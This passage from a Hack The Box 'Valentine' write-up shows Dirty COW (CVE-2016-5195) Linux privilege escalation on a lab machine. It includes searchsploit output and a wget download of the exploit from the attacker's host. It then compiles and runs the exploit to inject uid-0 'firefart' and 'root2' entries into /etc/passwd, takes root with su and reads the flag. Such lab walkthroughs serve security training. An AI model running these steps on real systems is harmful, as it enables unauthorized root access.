Gain access

The firefart line has been added to /etc/passwd

hype@Valentine:~$ head /etc/passwd
firefart:fi5FgEvdhZiPQ:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh

And su as firefart

hype@Valentine:~$ su - firefart
Password:
firefart@Valentine:~# whoami
firefart
firefart@Valentine:~# id
uid=0(firefart) gid=0(root) groups=0(root)

User escalation (CVE-2016-5195 Manual way)

Alternative way to escalate privileges, but this time manually.

Search exploit

root@kali:~/HTB/Machines/Valentine# searchsploit dirty cow
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                         |  Path
                                                                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                 | exploits/linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                 | exploits/linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)     | exploits/linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)        | exploits/linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                           | exploits/linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)     | exploits/linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                            | exploits/linux/local/40611.c
----------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Valentine# searchsploit -m 40838
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)
     URL: https://www.exploit-db.com/exploits/40838
    Path: /usr/share/exploitdb/exploits/linux/local/40838.c
File Type: C source, ASCII text, with CRLF line terminators


Copied to: /root/HTB/Machines/Valentine/40838.c

Upload and compile the exploit

hype@Valentine:~$ wget -q http://10.10.14.34/40838.c
hype@Valentine:~$ gcc -pthread 40838.c -o dirty -lcrypt

Run the exploit

hype@Valentine:~$ openssl passwd -crypt
Password:
Verifying - Password:
2KsQeC85CMFbA
hype@Valentine:~$ ./dirty /etc/passwd "root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bash"
/etc/passwd
  (___)
  (o o)_____/
   @@ `     \
    \ ____, /root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bash                      
    //    //
   ^^    ^^
mmap 7f2d83f1e000


madvise 0


ptrace 0

Gain access

It's not very clean, but our line has been added.

hype@Valentine:~$ head /etc/passwd
root2:2KsQeC85CMFbA:0:0:root:/root:/bin/bashTERM=x:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh

And su as root2

hype@Valentine:~$ su - root2
Password:
root2@Valentine:~# whoami
root2
root2@Valentine:~# id
uid=0(root2) gid=0(root) groups=0(root)

Root Flag

root@Valentine:/tmp# cat /root/root.txt
<ROOT_FLAG>

References

• Heartbleed (CVE-2014-0160) Test & Exploit Python Script
• Dirty Cow VulnerabilityDetails

Daniel Simao 14:03, 28 November 2019 (EST)